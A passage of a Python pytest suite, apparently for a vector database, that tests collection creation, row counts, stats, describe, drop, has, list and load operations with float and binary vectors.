stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == insert_count
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_no_entities(self, connect, binary_collection):
"""
target: test collection rows_count is correct or not, if collection is empty
method: create collection and no vectors in it,
assert the value returned by count_entities method is equal to 0
expected: the count is equal to 0
"""
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == 0
class TestCollectionMultiCollections:
"""
params mean different nb values; an nb value may or may not trigger a segment merge
"""
@pytest.fixture(
scope="function",
params=[
1,
1000,
2001
],
)
def insert_count(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_collection_count_multi_collections_l2(self, connect, insert_count):
"""
target: test collection rows_count is correct or not with multiple collections of L2
method: create collection and add entities in it,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
entities = gen_entities(insert_count)
collection_list = []
collection_num = 20
for i in range(collection_num):
collection_name = gen_unique_str(uid_count)
collection_list.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
connect.insert(collection_name, entities)
connect.flush(collection_list)
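# flush the whole collection list in one call so every collection's inserts are persisted before the per-collection row counts are checked below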
for i in range(collection_num):
stats = connect.get_collection_stats(collection_list[i])
assert stats[row_count] == insert_count
connect.drop_collection(collection_list[i])
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_multi_collections_binary(self, connect, binary_collection, insert_count):
"""
target: test collection rows_count is correct or not with multiple collections of JACCARD
method: create collection and add entities in it,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
raw_vectors, entities = gen_binary_entities(insert_count)
connect.insert(binary_collection, entities)
collection_list = []
collection_num = 20
for i in range(collection_num):
collection_name = gen_unique_str(uid_count)
collection_list.append(collection_name)
connect.create_collection(collection_name, cons.default_binary_fields)
connect.insert(collection_name, entities)
connect.flush(collection_list)
for i in range(collection_num):
stats = connect.get_collection_stats(collection_list[i])
assert stats[row_count] == insert_count
connect.drop_collection(collection_list[i])
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_multi_collections_mix(self, connect):
"""
target: test collection rows_count is correct or not with multiple collections of mixed metric types (L2 and JACCARD)
method: create collection and add entities in it,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
collection_list = []
collection_num = 20
for i in range(0, int(collection_num / 2)):
collection_name = gen_unique_str(uid_count)
collection_list.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
connect.insert(collection_name, cons.default_entities)
for i in range(int(collection_num / 2), collection_num):
collection_name = gen_unique_str(uid_count)
collection_list.append(collection_name)
connect.create_collection(collection_name, cons.default_binary_fields)
res = connect.insert(collection_name, cons.default_binary_entities)
connect.flush(collection_list)
for i in range(collection_num):
stats = connect.get_collection_stats(collection_list[i])
assert stats[row_count] == default_nb
connect.drop_collection(collection_list[i])
class TestGetCollectionStats:
"""
******************************************************************
The following cases are used to test `collection_stats` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_invalid_collection_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("CPU not support index_type: ivf_sq8h")
return request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_jaccard_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] in binary_support():
request.param["metric_type"] = "JACCARD"
return request.param
else:
pytest.skip("Skip index Temporary")
@pytest.fixture(
scope="function",
params=[
1,
1000,
2001
],
)
def insert_count(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_name_not_existed(self, connect, collection):
"""
target: get collection stats where collection name does not exist
method: call collection_stats with a random collection_name, which is not in db
expected: status not ok
"""
collection_name = gen_unique_str(uid_stats)
with pytest.raises(Exception) as e:
connect.get_collection_stats(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_name_invalid(self, connect, get_invalid_collection_name):
"""
target: get collection stats where collection name is invalid
method: call collection_stats with invalid collection_name
expected: status not ok
"""
collection_name = get_invalid_collection_name
with pytest.raises(Exception) as e:
connect.get_collection_stats(collection_name)
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_empty(self, connect, collection):
"""
target: get collection stats where no entity in collection
method: call collection_stats in empty collection
expected: row count is 0
"""
stats = connect.get_collection_stats(collection)
connect.flush([collection])
assert stats[row_count] == 0
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_without_connection(self, collection, dis_connect):
"""
target: test count_entities, without connection
method: calling count_entities with correct params, with a disconnected instance
expected: count_entities raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.get_collection_stats(collection)
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_batch(self, connect, collection):
"""
target: get row count with collection_stats
method: add entities, check count in collection info
expected: count as expected
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert int(stats[row_count]) == default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_single(self, connect, collection):
"""
target: get row count with collection_stats
method: add entity one by one, check count in collection info
expected: count as expected
"""
nb = 10
for i in range(nb):
connect.insert(collection, cons.default_entity)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == nb
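# Methods prefixed with a single underscore (e.g. _test_get_collection_stats_after_delete) are not collected by pytest; they appear to be kept as disabled cases pending feature support.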
@pytest.mark.tags(CaseLabel.L2)
def _test_get_collection_stats_after_delete(self, connect, collection):
"""
target: get row count with collection_stats
method: add and delete entities, check count in collection info
expected: status ok, count as expected
"""
ids = connect.insert(collection, cons.default_entities)
status = connect.flush([collection])
delete_ids = [ids[0], ids[-1]]
connect.delete_entity_by_id(collection, delete_ids)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats["row_count"] == default_nb - 2
assert stats["partitions"][0]["row_count"] == default_nb - 2
assert stats["partitions"][0]["segments"][0]["data_size"] > 0
# TODO: enable
@pytest.mark.tags(CaseLabel.L2)
def _test_get_collection_stats_after_compact_parts(self, connect, collection):
"""
target: get row count with collection_stats
method: add and delete entities, and compact collection, check count in collection info
expected: status ok, count as expected
"""
delete_length = 1000
ids = connect.insert(collection, cons.default_entities)
status = connect.flush([collection])
delete_ids = ids[:delete_length]
connect.delete_entity_by_id(collection, delete_ids)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
logging.getLogger().info(stats)
assert stats["row_count"] == default_nb - delete_length
compact_before = stats["partitions"][0]["segments"][0]["data_size"]
connect.compact(collection)
stats = connect.get_collection_stats(collection)
logging.getLogger().info(stats)
compact_after = stats["partitions"][0]["segments"][0]["data_size"]
assert compact_before == compact_after
@pytest.mark.tags(CaseLabel.L2)
def _test_get_collection_stats_after_compact_delete_one(self, connect, collection):
"""
target: get row count with collection_stats
method: add and delete one entity, and compact collection, check count in collection info
expected: status ok, count as expected
"""
ids = connect.insert(collection, cons.default_entities)
status = connect.flush([collection])
delete_ids = ids[:1]
connect.delete_entity_by_id(collection, delete_ids)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
logging.getLogger().info(stats)
compact_before = stats["partitions"][0]["row_count"]
connect.compact(collection)
stats = connect.get_collection_stats(collection)
logging.getLogger().info(stats)
compact_after = stats["partitions"][0]["row_count"]
assert compact_before == compact_after
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_partition(self, connect, collection):
"""
target: get partition info in a collection
method: call collection_stats after partition created and check partition_stats
expected: status ok, vectors added to partition
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_partitions(self, connect, collection):
"""
target: get partition info in a collection
method: create two partitions, add vectors in one of the partitions, call collection_stats and check
expected: status ok, vectors added to one partition but not the other
"""
new_tag = "new_tag"
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
connect.insert(collection, cons.default_entities, partition_name=default_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
connect.insert(collection, cons.default_entities, partition_name=new_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb * 2
connect.insert(collection, cons.default_entities)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb * 3
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_partitions_A(self, connect, collection, insert_count):
"""
target: test collection rows_count is correct or not
method: create collection, create partitions and add entities in it,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
new_tag = "new_tag"
entities = gen_entities(insert_count)
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
connect.insert(collection, entities)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == insert_count
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_partitions_B(self, connect, collection, insert_count):
"""
target: test collection rows_count is correct or not
method: create collection, create partitions and add entities in one of the partitions,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
new_tag = "new_tag"
entities = gen_entities(insert_count)
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
connect.insert(collection, entities, partition_name=default_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == insert_count
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_partitions_C(self, connect, collection, insert_count):
"""
target: test collection rows_count is correct or not
method: create collection, create partitions and add entities in one of the partitions,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of vectors
"""
new_tag = "new_tag"
entities = gen_entities(insert_count)
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
connect.insert(collection, entities)
connect.insert(collection, entities, partition_name=default_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == insert_count * 2
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_partitions_D(self, connect, collection, insert_count):
"""
target: test collection rows_count is correct or not
method: create collection, create partitions and add entities in one of the partitions,
assert the value returned by count_entities method is equal to length of entities
expected: the collection count is equal to the length of entities
"""
new_tag = "new_tag"
entities = gen_entities(insert_count)
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
connect.insert(collection, entities, partition_name=default_tag)
connect.insert(collection, entities, partition_name=new_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == insert_count * 2
# TODO: assert metric type in stats response
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_after_index_created(self, connect, collection, get_simple_index):
"""
target: test collection info after index created
method: create collection, add vectors, create index and call collection_stats
expected: status ok, index created and shown in segments
"""
connect.insert(collection, cons.default_entities)
connect.flush([collection])
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
# TODO: assert metric type in stats response
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_after_index_created_ip(self, connect, collection, get_simple_index):
"""
target: test collection info after index created
method: create collection, add vectors, create index and call collection_stats
expected: status ok, index created and shown in segments
"""
get_simple_index["metric_type"] = "IP"
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
get_simple_index.update({"metric_type": "IP"})
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
# TODO: assert metric type in stats response
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_after_index_created_jac(self, connect, binary_collection, get_jaccard_index):
"""
target: test collection info after index created
method: create collection, add binary entities, create index and call collection_stats
expected: status ok, index created and shown in segments
"""
ids = connect.insert(binary_collection, cons.default_binary_entities)
connect.flush([binary_collection])
connect.create_index(binary_collection, default_binary_vec_field_name, get_jaccard_index)
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_after_create_different_index(self, connect, collection):
"""
target: test collection info after index created repeatedly
method: create collection, add vectors, create index and call collection_stats multiple times
expected: status ok, index info shown in segments
"""
result = connect.insert(collection, cons.default_entities)
connect.flush([collection])
for index_type in ["IVF_FLAT", "IVF_SQ8"]:
connect.create_index(collection, default_float_vec_field_name,
{"index_type": index_type, "params": {"nlist": 1024}, "metric_type": "L2"})
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_multi_collections_indexed(self, connect):
"""
target: test collection rows_count is correct or not with multiple collections of L2
method: create collection and add entities in it,
assert the value returned by count_entities method is equal to length of entities
expected: row count in segments
"""
collection_list = []
collection_num = 10
for i in range(collection_num):
collection_name = gen_unique_str(uid_stats)
collection_list.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
res = connect.insert(collection_name, cons.default_entities)
connect.flush(collection_list)
index_1 = {"index_type": "IVF_SQ8", "params": {"nlist": 1024}, "metric_type": "L2"}
index_2 = {"index_type": "IVF_FLAT", "params": {"nlist": 1024}, "metric_type": "L2"}
if i % 2:
connect.create_index(collection_name, default_float_vec_field_name, index_1)
else:
connect.create_index(collection_name, default_float_vec_field_name, index_2)
for i in range(collection_num):
stats = connect.get_collection_stats(collection_list[i])
assert stats[row_count] == default_nb
index = connect.describe_index(collection_list[i], "")
if i % 2:
create_target_index(index_1, default_float_vec_field_name)
assert index == index_1
else:
create_target_index(index_2, default_float_vec_field_name)
assert index == index_2
# break
connect.drop_collection(collection_list[i])
class TestCreateCollection:
"""
******************************************************************
The following cases are used to test `create_collection` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_single_filter_fields()
)
def get_filter_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_single_vector_fields()
)
def get_vector_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_segment_row_limits()
)
def get_segment_row_limit(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def _test_create_collection_segment_row_limit(self, connect, get_segment_row_limit):
"""
target: test create normal collection with different fields
method: create collection with diff segment_row_limit
expected: no exception raised
"""
collection_name = gen_unique_str(uid_create)
fields = copy.deepcopy(cons.default_fields)
# fields["segment_row_limit"] = get_segment_row_limit
connect.create_collection(collection_name, fields)
assert connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L0)
def test_create_collection_after_insert(self, connect, collection):
"""
target: test insert vector, then create collection again
method: insert vector and create collection
expected: error raised
"""
connect.insert(collection, cons.default_entity)
try:
connect.create_collection(collection, cons.default_fields)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "Create collection failed: meta table add collection failed," \
"error = collection %s exist" % collection
@pytest.mark.tags(CaseLabel.L0)
def test_create_collection_after_insert_flush(self, connect, collection):
"""
target: test insert vector, then create collection again
method: insert vector and create collection
expected: error raised
"""
connect.insert(collection, cons.default_entity)
connect.flush([collection])
try:
connect.create_collection(collection, cons.default_fields)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "Create collection failed: meta table add collection failed," \
"error = collection %s exist" % collection
@pytest.mark.tags(CaseLabel.L2)
def test_create_collection_multithread(self, connect):
"""
target: test create collection with multithread
method: create collection using multithread,
expected: collections are created
"""
threads_num = 8
threads = []
collection_names = []
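# MyThread is assumed to be a Thread subclass from the test utilities that re-raises worker exceptions on join(), so assertion failures inside create() surface in the main thread.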
def create():
collection_name = gen_unique_str(uid_create)
collection_names.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
for i in range(threads_num):
t = MyThread(target=create, args=())
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
for item in collection_names:
assert item in connect.list_collections()
connect.drop_collection(item)
class TestCreateCollectionInvalid(object):
"""
Test creating collections with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_metric_types()
)
def get_metric_type(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_ints()
)
def get_segment_row_limit(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_ints()
)
def get_dim(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_invalid_string(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_field_types()
)
def get_field_type(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def _test_create_collection_with_invalid_segment_row_limit(self, connect, get_segment_row_limit):
collection_name = gen_unique_str()
fields = copy.deepcopy(cons.default_fields)
fields["segment_row_limit"] = get_segment_row_limit
with pytest.raises(Exception) as e:
connect.create_collection(collection_name, fields)
@pytest.mark.tags(CaseLabel.L2)
def _test_create_collection_no_segment_row_limit(self, connect):
"""
target: test create collection with no segment_row_limit params
method: create collection with correct params
expected: use default default_segment_row_limit
"""
collection_name = gen_unique_str(uid_create)
fields = copy.deepcopy(cons.default_fields)
fields.pop("segment_row_limit")
connect.create_collection(collection_name, fields)
res = connect.get_collection_info(collection_name)
logging.getLogger().info(res)
assert res["segment_row_limit"] == default_server_segment_row_limit
# TODO: assert exception
@pytest.mark.tags(CaseLabel.L2)
def test_create_collection_limit_fields(self, connect):
"""
target: test create collection with fields exceeding the maximum number
method: append 64 extra fields to the default fields and create the collection
expected: raise exception
"""
collection_name = gen_unique_str(uid_create)
limit_num = 64
fields = copy.deepcopy(cons.default_fields)
for i in range(limit_num):
field_name = gen_unique_str("field_name")
field = {"name": field_name, "type": DataType.INT64}
fields["fields"].append(field)
try:
connect.create_collection(collection_name, fields)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "maximum field's number should be limited to 64"
class TestDescribeCollection:
@pytest.fixture(
scope="function",
params=gen_single_filter_fields()
)
def get_filter_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_single_vector_fields()
)
def get_vector_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
logging.getLogger().info(request.param)
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return request.param
"""
******************************************************************
The following cases are used to test `describe_collection` function, no data in collection
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_collection_fields(self, connect, get_filter_field, get_vector_field):
"""
target: test create normal collection with different fields, check info returned
method: create collection with diff fields: metric/field_type/..., calling `describe_collection`
expected: no exception raised, and value returned correct
"""
filter_field = get_filter_field
vector_field = get_vector_field
collection_name = gen_unique_str(uid_describe)
fields = {
"fields": [gen_primary_field(), filter_field, vector_field],
# "segment_row_limit": default_segment_row_limit
}
connect.create_collection(collection_name, fields)
res = connect.describe_collection(collection_name)
# assert res['segment_row_limit'] == default_segment_row_limit
assert len(res["fields"]) == len(fields.get("fields"))
for field in res["fields"]:
if field["type"] == filter_field:
assert field["name"] == filter_field["name"]
elif field["type"] == vector_field:
assert field["name"] == vector_field["name"]
assert field["params"] == vector_field["params"]
@pytest.mark.tags(CaseLabel.L0)
def test_describe_collection_after_index_created(self, connect, collection, get_simple_index):
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
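# FLAT presumably builds no standalone index structure, so the describe_index checks below only apply to the other index types.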
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
assert index["index_type"] == get_simple_index["index_type"]
assert index["metric_type"] == get_simple_index["metric_type"]
assert index["params"] == get_simple_index["params"]
@pytest.mark.tags(CaseLabel.L2)
def test_describe_collection_without_connection(self, collection, dis_connect):
"""
target: test get collection info, without connection
method: calling get collection info with correct params, with a disconnected instance
expected: get collection info raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.describe_collection(collection)
@pytest.mark.tags(CaseLabel.L0)
def test_describe_collection_not_existed(self, connect):
"""
target: test describe collection after it is dropped
method: generate a random collection name, create the collection, describe it, then drop it and call describe_collection again
expected: raise exception
"""
collection_name = gen_unique_str(uid_describe)
connect.create_collection(collection_name, cons.default_fields)
connect.describe_collection(collection_name)
connect.drop_collection(collection_name)
try:
connect.describe_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L2)
def test_describe_collection_multithread(self, connect):
"""
target: test describe collection with multithread
method: describe the same collection using multiple threads
expected: describe_collection succeeds in every thread
"""
threads_num = 4
threads = []
collection_name = gen_unique_str(uid_describe)
connect.create_collection(collection_name, cons.default_fields)
def get_info():
connect.describe_collection(collection_name)
for i in range(threads_num):
t = MyThread(target=get_info)
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
"""
******************************************************************
The following cases are used to test `describe_collection` function, and insert data in collection
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_describe_collection_fields_after_insert(self, connect, get_filter_field, get_vector_field):
"""
target: test create normal collection with different fields, check info returned
method: create collection with diff fields: metric/field_type/..., calling `describe_collection`
expected: no exception raised, and value returned correct
"""
filter_field = get_filter_field
vector_field = get_vector_field
collection_name = gen_unique_str(uid_describe)
fields = {
"fields": [gen_primary_field(), filter_field, vector_field],
# "segment_row_limit": default_segment_row_limit
}
connect.create_collection(collection_name, fields)
entities = gen_entities_by_fields(fields["fields"], default_nb, vector_field["params"]["dim"])
res_ids = connect.insert(collection_name, entities)
connect.flush([collection_name])
res = connect.describe_collection(collection_name)
# assert res['segment_row_limit'] == default_segment_row_limit
assert len(res["fields"]) == len(fields.get("fields"))
for field in res["fields"]:
if field["type"] == filter_field:
assert field["name"] == filter_field["name"]
elif field["type"] == vector_field:
assert field["name"] == vector_field["name"]
assert field["params"] == vector_field["params"]
class TestDescribeCollectionInvalid(object):
"""
Test describe collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_describe_collection_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test describe collection which name invalid
method: call describe_collection with invalid names
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.describe_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("collection_name", ('', None))
def test_describe_collection_with_empty_or_None_collection_name(self, connect, collection_name):
"""
target: test describe collection which name is empty or None
method: call describe_collection with '' or None name
expected: raise exception
"""
with pytest.raises(Exception) as e:
connect.describe_collection(collection_name)
class TestDropCollection:
"""
******************************************************************
The following cases are used to test `drop_collection` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_drop_collection_A(self, connect, collection):
"""
target: test delete collection created with correct params
method: create collection and then delete,
assert the value returned by delete method
expected: status ok, and no collection in collections
"""
connect.drop_collection(collection)
time.sleep(2)
assert not connect.has_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_drop_collection_without_connection(self, collection, dis_connect):
"""
target: test describe collection, without connection
method: drop collection with correct params, with a disconnected instance
expected: drop raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.drop_collection(collection)
@pytest.mark.tags(CaseLabel.L0)
def test_drop_collection_not_existed(self, connect):
"""
target: test drop collection which is not created
method: generate a random collection name which does not exist in db, then call drop_collection
expected: raise exception
"""
collection_name = gen_unique_str(uid_drop)
try:
connect.drop_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L2)
def test_create_drop_collection_multithread(self, connect):
"""
target: test create and drop collection with multithread
method: create and drop collection using multithread,
expected: collections are created, and dropped
"""
threads_num = 8
threads = []
collection_names = []
def create():
collection_name = gen_unique_str(uid_drop)
collection_names.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
connect.drop_collection(collection_name)
for i in range(threads_num):
t = MyThread(target=create, args=())
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
for item in collection_names:
assert not connect.has_collection(item)
class TestDropCollectionInvalid(object):
"""
Test has collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_drop_collection_with_invalid_collection_name(self, connect, get_collection_name):
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("collection_name", ('', None))
def test_drop_collection_with_empty_or_None_collection_name(self, connect, collection_name):
with pytest.raises(Exception) as e:
connect.has_collection(collection_name)
class TestHasCollection:
"""
******************************************************************
The following cases are used to test `has_collection` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_without_connection(self, collection, dis_connect):
"""
target: test has collection, without connection
method: calling has collection with correct params, with a disconnected instance
expected: has collection raise exception
"""
with pytest.raises(Exception) as e:
assert dis_connect.has_collection(collection)
@pytest.mark.tags(CaseLabel.L0)
def test_has_collection_not_existed(self, connect):
"""
target: test has_collection after the collection is dropped
method: generate a random collection name, create the collection, then drop it,
check the value returned by has_collection after the drop
expected: False
"""
collection_name = gen_unique_str(uid_has)
connect.create_collection(collection_name, cons.default_fields)
assert connect.has_collection(collection_name)
connect.drop_collection(collection_name)
assert not connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_multithread(self, connect):
"""
target: test has collection with multithread
method: check has_collection using multiple threads
expected: has_collection returns True in every thread
"""
threads_num = 4
threads = []
collection_name = gen_unique_str(uid_has)
connect.create_collection(collection_name, cons.default_fields)
def has():
assert connect.has_collection(collection_name)
# assert not assert_collection(connect, collection_name)
for i in range(threads_num):
t = MyThread(target=has, args=())
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
class TestHasCollectionInvalid(object):
"""
Test has collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_with_invalid_collection_name(self, connect, get_collection_name):
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_with_empty_collection_name(self, connect):
collection_name = ''
with pytest.raises(Exception) as e:
connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_with_none_collection_name(self, connect):
collection_name = None
with pytest.raises(Exception) as e:
connect.has_collection(collection_name)
class TestListCollections:
"""
******************************************************************
The following cases are used to test `list_collections` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_list_collections_multi_collections(self, connect):
"""
target: test list collections
method: create collection, assert the value returned by list_collections method
expected: True
"""
collection_num = 50
collection_names = []
for i in range(collection_num):
collection_name = gen_unique_str(uid_list)
collection_names.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
assert collection_name in connect.list_collections()
for i in range(collection_num):
connect.drop_collection(collection_names[i])
@pytest.mark.tags(CaseLabel.L2)
def test_list_collections_without_connection(self, dis_connect):
"""
target: test list collections, without connection
method: calling list collections with correct params, with a disconnected instance
expected: list collections raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.list_collections()
# TODO: make sure to run this case in the end
@pytest.mark.skip("r0.3-test")
@pytest.mark.tags(CaseLabel.L2)
def test_list_collections_no_collection(self, connect):
"""
target: test show collections is correct or not, if no collection in db
method: delete all collections,
assert the value returned by list_collections method is equal to []
expected: the status is ok, and the result is equal to []
"""
result = connect.list_collections()
if result:
for collection_name in result:
assert connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_list_collections_multithread(self, connect):
"""
target: test list collection with multithread
method: list collection using multithread,
expected: list collections correctly
"""
threads_num = 10
threads = []
collection_name = gen_unique_str(uid_list)
connect.create_collection(collection_name, cons.default_fields)
def _list():
assert collection_name in connect.list_collections()
for i in range(threads_num):
t = MyThread(target=_list)
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
class TestLoadCollection:
"""
******************************************************************
The following cases are used to test `load_collection` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
return request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_binary_index(self, request, connect):
return request.param
@pytest.mark.tags(CaseLabel.L0)
def test_load_collection_after_index(self, connect, collection, get_simple_index):
"""
target: test load collection, after index created
method: insert and create index, load collection with correct params
expected: no error raised
"""
connect.insert(collection, cons.default_entities)
connect.flush([collection])
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
connect.load_collection(collection)
connect.release_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_after_index_binary(self, connect, binary_collection, get_binary_index):
"""
target: test load binary_collection, after index created
method: insert and create index, load binary_collection with correct params
expected: no error raised
"""
result = connect.insert(binary_collection, cons.default_binary_entities)
assert len(result.primary_keys) == default_nb
connect.flush([binary_collection])
for metric_type in binary_metrics():
get_binary_index["metric_type"] = metric_type
connect.drop_index(binary_collection, default_binary_vec_field_name)
if get_binary_index["index_type"] == "BIN_IVF_FLAT" and metric_type in structure_metrics():
with pytest.raises(Exception) as e:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
else:
